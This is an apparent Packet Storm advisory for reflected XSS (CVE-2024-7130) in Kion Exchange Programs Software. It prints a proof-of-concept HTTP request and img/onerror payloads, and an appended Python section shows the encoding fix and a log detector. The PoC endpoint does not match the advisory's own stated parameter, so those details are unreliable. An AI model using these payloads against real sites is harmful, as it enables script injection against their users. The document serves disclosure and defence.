Kion Exchange Programs Software 1.21.9092.29966 Cross Site Scripting

Published: 29 May 2025 00:00:00 | Reported by: Kutay Ergen | Type: packetstorm | Source: packetstorm.news | 97 views

Reflected cross site scripting in Kion Exchange Programs Software via programsearch.aspx searchtext.

Related

Family        Title                                                                           Published          Reporter
ATTACKERKB    CVE-2024-7130                                                                   21 Nov 2024 14:15  attackerkb
CNNVD         KION Exchange Programs Software Cross-Site Scripting Vulnerability              21 Nov 2024 00:00  cnnvd
CVE           CVE-2024-7130                                                                   21 Nov 2024 13:44  cve
Cvelist       CVE-2024-7130 Reflected XSS in Kion Computer's KION Exchange Programs Software  21 Nov 2024 13:44  cvelist
EUVD          EUVD-2024-48831                                                                 3 Oct 2025 20:07   euvd
NVD           CVE-2024-7130                                                                   21 Nov 2024 14:15  nvd
RedhatCVE     CVE-2024-7130                                                                   23 May 2025 06:43  redhatcve
Vulnrichment  CVE-2024-7130 Reflected XSS in Kion Computer's KION Exchange Programs Software  21 Nov 2024 13:44  vulnrichment
# Exploit Title: Kion Exchange Programs Software Reflected XSS
# CVE: CVE-2024-7130
# PoC-Date: 2025-05-28
# Exploit Author: Kutay ERGEN
# Vendor Homepage: https://www.kionexchangeprograms.com
# Version: <= 1.21.9092.29966
# Tested on: Chrome 124, Firefox 125
# CVSS Score: 5.5 (Medium)
# CWE: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
# Educational Use Only: This PoC is published for academic research and testing purposes only. Unauthorized use is strictly prohibited.

## Vulnerability Summary:
The Kion Exchange Programs Software is affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the programsearch.aspx endpoint. The searchtext query parameter fails to sanitize input, allowing attackers to inject arbitrary HTML/JS code.

## Proof of Concept:
POST /Account/Login.aspx?pId= HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

_CALLBACKID=<img src=x onerror=alert('XSS');>&_CALLBACKPARAM=c0:resetPassword

Payload:
#<img src=M onerror=alert(1);>
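The advisory says the searchtext parameter is echoed into the page without neutralization (CWE-79). The following is an added example, not code from the advisory, from Packet Storm or from the vendor's ASP.NET application: it models the defect with a generic render function, shows the standard fix (contextual HTML output encoding), and runs a simple detection over constructed request-log lines that flag the tag-plus-event-handler shape of the advisory's own payload. The log line layout and the render functions are assumptions for illustration only.

```python
import html
import re
from urllib.parse import unquote_plus

# The payload is the one printed in the advisory above; nothing new is added here.
POC_PAYLOAD = "<img src=M onerror=alert(1);>"


def render_vulnerable(searchtext: str) -> str:
    """Model of the defect: the parameter is echoed into HTML unencoded."""
    return f"<p>Results for: {searchtext}</p>"


def render_safe(searchtext: str) -> str:
    """Fix: encode the value for the HTML-body context before echoing it.
    html.escape turns < > & " ' into entities, so browser-parsed markup cannot
    be injected through the parameter."""
    return f"<p>Results for: {html.escape(searchtext, quote=True)}</p>"


def is_reflected_unencoded(rendered: str, payload: str) -> bool:
    """True when the raw payload survives into the response body verbatim."""
    return payload in rendered


# Detection: a tag opener followed somewhere by an on<event>= attribute.
TAG_RE = re.compile(r"<\s*[A-Za-z!/]")
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def flag_query(query_string: str) -> bool:
    """URL-decode a query string and report whether it carries markup with an
    inline event handler. Plain '<' or '>' characters (e.g. '1<2') do not match."""
    decoded = unquote_plus(query_string)
    return bool(TAG_RE.search(decoded) and EVENT_HANDLER_RE.search(decoded))


# Constructed sample log (hypothetical layout: date time method path query status).
SAMPLE_LOG = """\
2025-05-28 10:00:01 GET /programsearch.aspx searchtext=erasmus 200
2025-05-28 10:00:02 GET /programsearch.aspx searchtext=%3Cimg+src%3DM+onerror%3Dalert(1)%3B%3E 200
2025-05-28 10:00:03 GET /programsearch.aspx searchtext=1%3C2+and+3%3E2 200
"""


def flagged_lines(log: str) -> list:
    """Return the log lines whose query string matches the injection pattern."""
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        if flag_query(parts[4]):
            hits.append(line)
    return hits


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(POC_PAYLOAD))
    print("safe:      ", render_safe(POC_PAYLOAD))
    for hit in flagged_lines(SAMPLE_LOG):
        print("flagged:", hit)
```

The encoding step is the actual remediation; the regex detector is a coarse triage aid for proxy or IIS logs and will not catch every encoding variant, so treat it as a signal, not a control.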


Current as of 29 May 2025 00:00
Vulners AI Score: 6.6 (Medium risk)
CVSS 3.1: 5.5
EPSS: 0.00094